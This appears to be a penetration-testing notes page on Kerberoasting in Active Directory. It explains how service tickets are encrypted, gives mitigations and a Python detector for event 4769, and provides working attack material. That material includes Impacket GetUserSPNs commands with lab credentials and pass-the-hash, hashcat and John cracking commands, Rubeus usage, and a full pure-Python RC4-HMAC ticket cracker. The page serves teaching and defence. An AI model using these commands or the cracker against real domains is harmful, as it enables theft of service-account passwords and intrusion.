
Kerberoasting

Introduction

When a domain user asks to use a service, the Domain Controller (DC), acting as the Key Distribution Center (KDC), issues a service ticket (TGS) for that service's Service Principal Name (SPN). Part of that ticket is encrypted with the long-term key of the account the service runs under; for the RC4-HMAC encryption type (etype 23) that key is simply the account's NT hash, which is derived directly from its password. Kerberoasting abuses this: any authenticated domain user can request a service ticket for any SPN that is registered to a user account, take the encrypted part offline and guess the service account's password until one of the guesses decrypts it. No special privileges are needed, only a valid TGT, so any domain account that can request service tickets can perform the attack. SPNs registered to computer accounts (names ending in `$`) are not worth requesting: those passwords are long, random and rotated automatically.

Note: You NEED valid credentials (or an existing TGT) inside the domain to perform this attack.

High-Level Understanding

  • The messages that matter are the KRB-TGS-REQ and the KRB-TGS-REP
  • In the REQ, the client presents its TGT to the KDC and asks for a service ticket for a particular SPN
  • In the REP, the KDC returns the service ticket; the ticket's enc-part is encrypted with the key of the account the service runs under (for RC4-HMAC, the NT hash of that account's password)
    • Any account with an SPN set can be targeted this way; the interesting ones are user accounts that were created to run a service and have a human-chosen password
    • A kerberoast hash extracted from the reply looks like `$krb5tgs$23$*user$REALM$spn*$<16-byte HMAC-MD5 checksum>$<RC4 ciphertext>` for etype 23 (hashcat mode 13100); tickets issued with AES start with `$krb5tgs$17$` or `$krb5tgs$18$` and crack far more slowly
  • Nothing in the reply is the NTLM hash itself: you take the encrypted ticket offline and try candidate passwords until one derives the key that verifies the ticket's checksum
  • You can run this attack from a domain-joined host or remotely over the network, as long as you have valid account credentials

Mitigation Strategies

  • Kerberoasting abuses how Kerberos is designed to work (any principal may ask for a ticket to any service), so there is no patch for it; the goal is to make the offline cracking step fail or get noticed
  • Enforce long, complex passwords for service accounts (25+ characters, stronger than the ordinary user policy) so dictionary and rule-based cracking are hopeless
  • Rotate service account credentials on a schedule and set an expiry instead of letting them live for years
  • Prefer Group Managed Service Accounts (gMSA) where the application supports them: the password is 120 random characters and the DC rotates it automatically
  • Restrict service accounts to AES (msDS-SupportedEncryptionTypes without RC4) so their tickets are issued with etype 17/18 rather than etype 23
  • Make sure your service accounts are using the least privilege possible
    • Do NOT put these accounts in the Domain Admins group
  • Monitor Security event 4769 for RC4 (0x17) ticket requests against user service accounts, and for one user requesting tickets for many SPNs in a short window
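The last mitigation bullet is a detection, and the logic is short enough to show. The following is an added example (not from the original page): it runs over a handful of constructed Security event 4769 records, keeps only the requests that a roaster would make (RC4 ticket, service account that is neither krbtgt nor a computer account) and flags any user who pulled tickets for several distinct service accounts inside a short window. The field names follow the real 4769 event; the timestamps, users, SPNs and the `min_spns`/`window` thresholds are assumptions for this example, and legitimate RC4-only legacy applications will need to be baselined before alerting on single requests.

```python
"""Flag Kerberoasting candidates in Security event 4769 records (added example, constructed data)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4769 ("A Kerberos service ticket was requested") events. TicketEncryptionType 0x17 is
# RC4-HMAC, 0x12 is AES256. Workstations normally get AES; a roaster asks for RC4 to get cheap hashes.
SAMPLE_4769 = [
    {"TimeCreated": "2024-03-01T09:00:00", "TargetUserName": "hope.sharp@SEARCH.HTB",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "10.10.14.5"},
    {"TimeCreated": "2024-03-01T09:00:02", "TargetUserName": "hope.sharp@SEARCH.HTB",
     "ServiceName": "web_svc", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"TimeCreated": "2024-03-01T09:00:02", "TargetUserName": "hope.sharp@SEARCH.HTB",
     "ServiceName": "sql_svc", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"TimeCreated": "2024-03-01T09:00:03", "TargetUserName": "hope.sharp@SEARCH.HTB",
     "ServiceName": "backup_svc", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"TimeCreated": "2024-03-01T09:05:00", "TargetUserName": "alice@SEARCH.HTB",
     "ServiceName": "web_svc", "TicketEncryptionType": "0x12", "IpAddress": "10.10.20.7"},
    {"TimeCreated": "2024-03-01T09:06:00", "TargetUserName": "WS01$@SEARCH.HTB",
     "ServiceName": "DC01$", "TicketEncryptionType": "0x12", "IpAddress": "10.10.20.8"},
]


def is_roastable_request(ev) -> bool:
    """RC4 ticket for a user service account: krbtgt (TGT renewals) and computer accounts
    (names ending in '$', random 120-char passwords) are not crackable and are ignored."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() == "0x17"
            and svc.lower() != "krbtgt"
            and not svc.endswith("$"))


def find_kerberoasting(events, window=timedelta(minutes=5), min_spns=3) -> dict:
    """Return {'bursts': {user: [service accounts]}, 'rc4_requests': {user: [service accounts]}}.
    'bursts' lists users who requested RC4 tickets for >= min_spns distinct service accounts within
    `window`; 'rc4_requests' keeps every RC4 requester so a single request for one high-value SPN
    can still be reviewed by hand."""
    per_user = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            per_user[ev["TargetUserName"]].append(
                (datetime.fromisoformat(ev["TimeCreated"]), ev["ServiceName"]))
    bursts = {}
    for user, reqs in per_user.items():
        reqs.sort()
        # slide a window starting at each request and count distinct service accounts inside it
        for i, (t0, _) in enumerate(reqs):
            names = {name for t, name in reqs[i:] if t - t0 <= window}
            if len(names) >= min_spns:
                bursts[user] = sorted(names)
                break
    return {"bursts": bursts,
            "rc4_requests": {u: sorted({n for _, n in r}) for u, r in per_user.items()}}


if __name__ == "__main__":
    for user, spns in find_kerberoasting(SAMPLE_4769)["bursts"].items():
        print(f"possible kerberoasting by {user}: RC4 tickets for {', '.join(spns)}")
```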

How To

GetUserSPNs.py (Impacket)

  • List the user accounts that have an SPN and request a service ticket for each of them with the following command (the `search.htb` credentials are the page's HTB example):

```bash
GetUserSPNs.py -request -dc-ip <IP> search.htb/hope.sharp:IsolationIsKey

# The SPN will appear as RESEARCH/web_svc.search.htb:60001
# You will also get a hash (a $krb5tgs$23$... line), save it and crack it with John

john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt hash

# Or Hashcat
# -m 13100 -- Kerberos 5, etype 23, TGS-REP
# -a 0     -- straight dictionary attack with the specified wordlist

hashcat -m 13100 -a 0 kerberoast.txt /usr/share/wordlists/rockyou.txt

# Domain account / credentials method (the password is prompted)
GetUserSPNs.py -request -dc-ip 192.168.2.160 <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast

# Domain account / credentials method with pass-the-hash
GetUserSPNs.py -request -dc-ip 192.168.2.160 -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast
```
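Both the High-Level Understanding section above and the John/hashcat commands rely on the same fact: for etype 23 the ticket's encryption key is the service account's NT hash, so every candidate password can be tested offline. The following is an added example, not code from the original page or from Impacket, John or hashcat, that does in pure Python what `hashcat -m 13100` does with a `$krb5tgs$23$` line: derive the key from a password (MD4 over UTF-16LE), derive the RC4-HMAC sub-keys for key usage 2 as in RFC 4757, decrypt and verify the HMAC-MD5 checksum. MD4 and RC4 are implemented inline because OpenSSL 3 builds of Python often ship without MD4. The sample line is constructed here from the SPN on the page, a made-up password `Winter2019!` and a placeholder enc-part; nothing about the real `web_svc` account is assumed.

```python
"""RC4-HMAC (etype 23) Kerberoast cracker in pure Python (added example, constructed sample)."""
from __future__ import annotations

import hashlib
import hmac
import struct

TGS_REP_TICKET_KEY_USAGE = 2  # key usage number for a service ticket's enc-part (RFC 4120)


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, inlined because hashlib's MD4 is often disabled on OpenSSL 3."""
    mask = 0xFFFFFFFF
    rot = lambda x, n: ((x << n) | ((x & mask) >> (32 - n))) & mask
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (
        (F, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (G, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for fn, const, shifts, order in rounds:
            for i, k in enumerate(order):
                a, b, c, d = d, rot(a + fn(b, c, d) + X[k] + const, shifts[i % 4]), b, c
        state = [(s + v) & mask for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); for etype 23 this IS the Kerberos long-term key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 keystream XOR (encryption and decryption are the same operation)."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _k1(key: bytes, usage: int) -> bytes:
    # RFC 4757: K1 = HMAC-MD5(K, little-endian 32-bit key usage number)
    return hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, plaintext: bytes, confounder: bytes) -> tuple[bytes, bytes]:
    """RFC 4757 encryption as the KDC does it: returns (checksum, ciphertext)."""
    k1 = _k1(key, usage)
    checksum = hmac.new(k1, confounder + plaintext, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return checksum, rc4(k3, confounder + plaintext)


def rc4_hmac_try_key(key: bytes, usage: int, checksum: bytes, edata: bytes) -> bool:
    """Decrypt with a candidate key and check the HMAC; True means the password was right."""
    k1 = _k1(key, usage)
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    plain = rc4(k3, edata)  # confounder || EncTicketPart
    return hmac.compare_digest(hmac.new(k1, plain, hashlib.md5).digest(), checksum)


def parse_krb5tgs(line: str) -> dict:
    """Split a hashcat 13100 line: $krb5tgs$23$*user$REALM$spn*$checksum$edata."""
    prefix = "$krb5tgs$23$*"
    if not line.startswith(prefix):
        raise ValueError("only etype 23 (RC4-HMAC) lines are handled here")
    header, rest = line[len(prefix):].split("*$", 1)
    user, realm, spn = header.split("$", 2)
    checksum_hex, edata_hex = rest.split("$", 1)
    return {"user": user, "realm": realm, "spn": spn,
            "checksum": bytes.fromhex(checksum_hex), "edata": bytes.fromhex(edata_hex)}


def kerberoast_crack(line: str, wordlist) -> str | None:
    """Offline attack: derive a key from each candidate password and test it against the ticket."""
    h = parse_krb5tgs(line)
    for candidate in wordlist:
        if rc4_hmac_try_key(nt_hash(candidate), TGS_REP_TICKET_KEY_USAGE, h["checksum"], h["edata"]):
            return candidate
    return None


def make_sample_line(user: str, realm: str, spn: str, password: str, plaintext: bytes) -> str:
    """Build a constructed $krb5tgs$23$ line the way a KDC would encrypt the ticket. The confounder
    is fixed so the output is deterministic; a real KDC uses 8 random bytes."""
    checksum, edata = rc4_hmac_encrypt(nt_hash(password), TGS_REP_TICKET_KEY_USAGE, plaintext, bytes(range(8)))
    return f"$krb5tgs$23$*{user}${realm}${spn}*${checksum.hex()}${edata.hex()}"


# Constructed sample: the SPN from the page, a made-up password and a placeholder enc-part
# (a real one is a DER-encoded EncTicketPart; its contents do not matter for the crack).
SAMPLE_LINE = make_sample_line("web_svc", "SEARCH.HTB", "RESEARCH/web_svc.search.htb:60001",
                               "Winter2019!", b"EncTicketPart placeholder (constructed)")

if __name__ == "__main__":
    print(SAMPLE_LINE[:72] + "...")
    print("cracked:", kerberoast_crack(SAMPLE_LINE, ["password", "123456", "Winter2019!"]))
```

The check in `rc4_hmac_try_key` is exactly why the attack is offline and silent: the KDC is never contacted again, and a wrong password simply fails the HMAC comparison. Swapping `nt_hash` for a PBKDF2-based AES key derivation (4096 iterations per guess for etype 17/18) is what makes AES-only service accounts so much more expensive to roast.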

Grepping for Hashcat Formats

```bash
hashcat --help | grep etype
# 13100 | Kerberos 5, etype 23, TGS-REP   <- RC4-HMAC, the usual kerberoast target
# 19600 | Kerberos 5, etype 17, TGS-REP   <- AES128, needs the $krb5tgs$17$ format
# 19700 | Kerberos 5, etype 18, TGS-REP   <- AES256, needs the $krb5tgs$18$ format
```

Rubeus

  • Run from a domain-joined host in the context of a domain user; the output is hashcat-ready `$krb5tgs$` lines for every user account with an SPN:

```powershell
Rubeus.exe kerberoast
```

Reference

{% embed url="https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast" %}